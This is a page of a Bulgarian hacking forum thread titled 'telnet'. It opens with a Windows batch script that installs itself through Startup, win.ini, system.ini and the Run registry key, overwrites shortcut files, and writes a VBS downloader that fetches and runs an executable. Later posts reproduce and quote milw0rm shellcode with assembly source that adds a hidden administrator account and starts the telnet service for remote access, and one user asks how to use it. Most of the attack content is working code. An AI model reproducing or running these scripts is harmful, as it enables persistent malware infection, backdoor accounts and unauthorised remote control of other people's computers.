download.bg
 Вход Списание  Новини  Програми  Статии  Форум  Чат   Абонамент  Топ95   Архив 

Форум » Системни администратори и хакери » telnet

telnet

<1 2 3 4 5 6 >

Автор
Съобщение
anonymous
Вто, 29.07.08, 18:34
copy ex3 "%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy ex3 %windir%\tank.bat
cmd /c "echo [windows] >> %windir%\win.ini"
cmd /c "echo load=%windir%\tank.bat >> %windir%\win.ini"
cmd /c "echo run=%windir%\tank.bat >> %windir%\win.ini"
cmd /c "echo nullport=None >> %windir%\win.ini"
 
copy ex3 %systemdrive%\WINDOWS\system32\csrss.bat
cmd /c "echo [boot] >> %windir%\system.ini"
cmd /c "echo shell=csrss.exe %systemdrive%\WINDOWS\system32\csrss.bat >> %windir%\system.ini"
 
copy ex3 %windir%\system\oobe.bat
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v oobe /t REG_SZ /d %windir%\system\oobe.bat /f
start IEXPLORE "www.crazyfriendove.piczo.com"
copy ex3 C:\WINDOWS\eolrhwpo.vbs
copy ex3 C:\WINDOWS\vxdma.bat
copy ex3 C:\WINDOWS\eoirhwpo.vbs
cmd /c "echo.on error resume next >C:\WINDOWS\eoirhwpo.vbs"
cmd /c "echo dim wsh >>C:\WINDOWS\eoirhwpo.vbs"
cmd /c "echo set wsh=wscript.createobject("wscript.shell") >>C:\WINDOWS\eoirhwpo.vbs"
cmd /c "echo wshs.run "C:\WINDOWS\vxdma.bat" >>C:\WINDOWS\eoirhwpo.vbs"
cmd /c "echo dim wsh, msc > C:\WINDOWS\eolrhwpo.vbs"
cmd /c "echo set wsh=wscript.CreateObject("wscript.Shell") >> C:\WINDOWS\eolrhwpo.vbs"
cmd /c "echo set msc=wsh.CreateShortcut("C:\xxx.lnk") >>C:\WINDOWS\eolrhwpo.vbs"
cmd /c "echo msc.TargetPath = wshs.ExpandEnvironmentStrings("C:\WINDOWS\eoirhwpo.vbs ") >> C:\WINDOWS\eolrhwpo.vbs"
cmd /c "echo msc.WindowStyle = 4 >> C:\WINDOWS\eolrhwpo.vbs"
cmd /c "echo msc.save >> C:\WINDOWS\eolrhwpo.vbs"
cscript C:\WINDOWS\eolrhwpo.vbs
del C:\WINDOWS\eolrhwpo.vbs
for %k in (*.lnk \*.lnk ..\*.lnk C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\Alky for Applications\Libraries\\*.lnk C:\WINDOWS\*.lnk) do copy C:\xxx.lnk %k
del C:\xxx.lnk
cmd /c "echo Dim DataBin >temp.vbs"
cmd /c "echo Dim HTTPGET >>temp.vbs"
cmd /c "echo Set HTTPGET = CreateObject(”Microsoft.XMLHTTP”) >>temp.vbs"
cmd /c "echo HTTPGET.Open “GET”, “n“, False>>temp.vbs"
cmd /c "echo HTTPGET.Send >>temp.vbs"
cmd /c "echo DataBin = HTTPGET.ResponseBody >>temp.vbs"
cmd /c "echo Const adTypeBinary=1 >>temp.vbs"
cmd /c "echo Const adSaveCreateOverWrite=2 >>temp.vbs"
cmd /c "echo Dim test1 >>temp.vbs"
cmd /c "echo Set test1 = CreateObject(”ADODB.Stream”) >>temp.vbs"
cmd /c "echo test1.Type = adTypeBinary >>temp.vbs"
cmd /c "echo test1.Open >>temp.vbs"
cmd /c "echo test1.Write DataBin >>temp.vbs"
cmd /c "echo test1.SaveToFile “emac.exe”, adSaveCreateOverWrite >>temp.vbs"
cscript temp.vbs
start emac.exe -h
rasdial n n n
rasdial 412412412
Отговор  За печат  
phrozencrew
Вто, 15.09.09, 18:47
Убав Copy-Paste от milw0rm.com . Иначе експлойта за придобиване на права през telnet си го бива, само за 111 байта!
; payload:add admin acount & Telnet Listening
; Author: DATA_SNIPER
; size:111 bytes 
; platform:WIN32/XP SP2 FR
; thanks:Arab4services team & AT4RE Team
; more info: visit my blog http://datasniper.arab4services.net
; The Sh3llcode:
; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63"
; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35"
; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73"
; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61"
; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00"
; Description: it's simular to TCP BindShell on port 23,throught Command execution we can get shell access throught telnet service on Windows b0x.
; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD
; Start telnet service: sc start TlntSvr
; For saving ur access to the B0x again and again :),u can use this command:
; "sc config TlntSvr start= auto &  sc start TlntSvr" instead of:
; "sc start TlntSvr"
; NASM -s -fbin telnetbind.asm
BITS 32 
db 0EBh,08h    ;such as "jmp Data" ,i puted it in opcode format for avoiding null problem.
Exec:
MOV EDX,7C86114Dh ;WinExec addr in WIN XP SP2 FR
CALL EDX
INT3 ;just interrupter (hung the shellcode after it do his job,any way u can use ExitProcess) for avoiding infinite loop
Data:
CALL Exec
db 'cmd /c net user GAZZA 123456 /ADD & net localgroup Administrateurs GAZZA /ADD & sc start TlntSvr',00h
;add user GAZA with 123456 password and start telnet service ;BTW the exstension cuted for saving som byte ;)
 
; milw0rm.com [2009-02-27] 
 

Отговор  За печат  
deringer
Вто, 15.09.09, 18:55
use linux
Nmap+Telnet_crack.tar.gz

http://www.instructables.com/id/Renegade-BBS-in-Ubuntu-Linux-Telnet-Multi-Node/

Подробности...всеки може да научи сам...

Отговор  За печат  
phrozencrew
Вто, 15.09.09, 22:21

RE: RE: telnet

Цитат на thedreizer от Вторник, 15.09.2009 22:09
” Ърм да сам казал че аз съм го писал:? ....НЕ! „
Няма значение, пак е готино ! Жалко само, че е само за XP SP2 FR.
Отговор  За печат  
танясекс
Вто, 15.09.09, 22:28

RE: telnet

Цитат на thedreizer от Вторник, 15.09.2009 17:09
” Ърм Еди аз милсля че тоя скрипт е по одачен:
BITS 32 
db 0EBh,08h
Exec:
MOV EDX,7C86114Dh
CALL EDX
INT3
Data:
CALL Exec
db 'cmd /c net user TheDreizer 1 /ADD & net localgroup Administrateurs TheDreizer /ADD & sc start TlntSvr',00h

Г-н thedreizer , бихте ли ми обяснили как се ползва това

P.S Още ли има някой на ХР SP2

редактиран от танясекс на 15.09.09 22:29
Отговор  За печат  
anonymous
Вто, 15.09.09, 23:02
Аз съм на SP 2.
Отговор  За печат  
танясекс
Вто, 15.09.09, 23:07
Mинавай докато е време на SP3
Отговор  За печат  
anonymous
Вто, 15.09.09, 23:28

RE: telnet

Цитат на танясекс от Вторник, 15.09.2009 23:07
” Mинавай докато е време на SP3
ААА не, чакам да излезе SP10...чак тогава, сега ме мързи....
Отговор  За печат  
танясекс
Вто, 15.09.09, 23:35
A ти ( thedreizer ) ще ми обясниш ли как се използва експлойта , вместо да пишеш безсмислени коментари
Отговор  За печат  
deringer
Сря, 16.09.09, 00:07

RE: telnet

Цитат на танясекс от Вторник, 15.09.2009 23:35
” A ти ( thedreizer ) ще ми обясниш ли как се използва експлойта , вместо да пишеш безсмислени коментари
той май го е написал...ама не е прочел какво точно е копнал
Description: it's simular to TCP BindShell on port 23,throught Command execution we can get shell access throught telnet service on Windows b0x.
; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD
; Start telnet service: sc start TlntSvr
; For saving ur access to the B0x again and again :),u can use this command:
; "sc config TlntSvr start= auto & sc start TlntSvr" instead of:
; "sc start TlntSvr"
; NASM -s -fbin telnetbind.asm
Отговор  За печат  
танясекс
Сря, 16.09.09, 00:13
Ееее deringer , развали ми веселото
Отговор  За печат  
anonymous
Съб, 05.02.11, 14:51

Бреи тази тема още стои :)

редактиран от anonymous на 05.02.11 15:03
Отговор  За печат  

<1 2 3 4 5 6 >

Коментар

за нас | за разработчици | за реклама | станете автори | in english  © 1998-2024   Experta Ltd.